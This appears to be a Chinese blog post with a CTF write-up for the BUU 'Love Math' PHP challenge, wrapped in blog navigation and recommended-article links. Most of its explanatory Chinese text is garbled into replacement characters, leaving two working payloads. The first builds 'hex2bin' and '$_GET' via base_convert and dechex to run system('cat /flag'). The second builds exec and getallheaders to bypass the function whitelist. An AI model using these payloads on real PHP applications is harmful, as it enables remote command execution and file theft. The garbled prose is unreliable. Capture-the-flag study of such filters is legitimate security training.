首页 博客列表 精选博客 每日焦点 关于我
BUU-WEB-[CISCN 2019 初赛]Love Math
发布日期:2021-05-15 21:03:35 浏览次数:12 分类:精选文章

本文共 2060 字,大约阅读时间需要 6 分钟。

PHP���������������������payload������

������������������

���������PHP���������������������������������������������������

  • ���������������������������������������������������������������������������c������������GET���������������
  • ���������������������c���������������������80���������
  • ���������������c������������������������������������������������|���&���>``���<���"���'���`������
  • ���������������������������������PHP���������������������������abs���acos���asin���atan������

    • ������������������������������������������������������������������������������������������

    payload������������

    payload������������������������������������

  • ���������������������hex2bin���dechex���16������������������������������������������
  • ���������������������eval������������������������������������exec���system������������������
  • ���������������������base_convert������������������������������������������������������������

    • ������1���GET������������payload

    /c=$pi=base_convert(37907361743,10,36)(dechex(1598506324))($$pi){$pi}(abs)&pi=system&abs=cat%20/flag

    ���������������

  • base_convert(37907361743,10,36)���������"hex2bin"���
  • dechex(1598506324)���������"5f474554"���
  • $pi������hex2bin���������$_GET���
  • ($$pi){$pi}(abs)������$_GET["pi"](abs)���������������cat /flag���������

    • ������2���������getallheaders������_header������

    /c=$pi=base_convert(696468,10,36)($pi(8768397090111664438,10,30)(){1})

    ���������������

  • base_convert(696468,10,36)���������"exec".
  • base_convert(8768397090111664438,10,30)���������"getallheaders".
  • exec("getallheaders")���������������������������

    • ���������������������������

    ������������������������������������������eval���������������������������������SQL������������������������������preg_replace���������������������������������������������

    ������������������������������������������������������������������������������������PHP������������������������������������������������������������������������exec���system������������������������������������������������������������

    ������������������������������������������������������������������������������������

    上一篇:BUU-WEB-[安洵杯 2019]easy_serialize_php
    下一篇:BUU-WEB-[CISCN2019 华北赛区 Day2 Web1]Hack World

    发表评论

    最新留言

    初次前来,多多关照!
    [***.217.46.12]2025年04月17日 21时04分34秒

    关于作者

        喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
    -- 愿君每日到此一游!

    推荐文章

    jQuery动画 2021-05-16
    缺省Servlet 2021-05-16
    ajax解析日期为Object 2021-05-16
    Liferay文件的上传 2021-05-16
    title遇到空格显示不全 2021-05-16
    Struts2简单登录使用(两种方法) 2021-05-16
    Keycloak的SSO功能与cookie的关系 2021-05-16
    初始微服务---Springcloud发展【第一期】 2021-05-16
    Vmvare workstation下载安装及配置 2021-05-16
    Mock框架 Mockito 2021-05-16
    连接数据库报“You have an error in your SQL syntax”异常的解决 2021-05-16
    RAFT 拜占庭将军 共识算法 2021-05-16
    (记疑未答)变量名通过符号表联系内存,那符号表能在VS中调出来看吗 2021-05-16
    UE4 错误列表 error码(只记录我遇到的情况,持续添加,未完成) 2021-05-16
    虚幻四C++ 添加角色动画 2021-05-16
    PostgreSQL 14 新增default role——pg_database_owner 2021-05-16
    【Linux】Linux下设置环境变量 2021-05-16
    利用委托与Lambada创建和调用webapi接口 2021-05-16
    【.net+jquery】绘制自定义表单(含源码) 2021-05-16
    JavaScript--onblur失去焦点-触发事件 2021-05-16
    白红宇的个人博客 - 记录点点滴滴的事 - 您是第 461343452 位访客
    访问时间: 2025-05-06 04:59:46 访问IP: 13.59.225.66     Copyright © 2020 - 2025 css8.cn 京ICP备2021015314号-1 手机版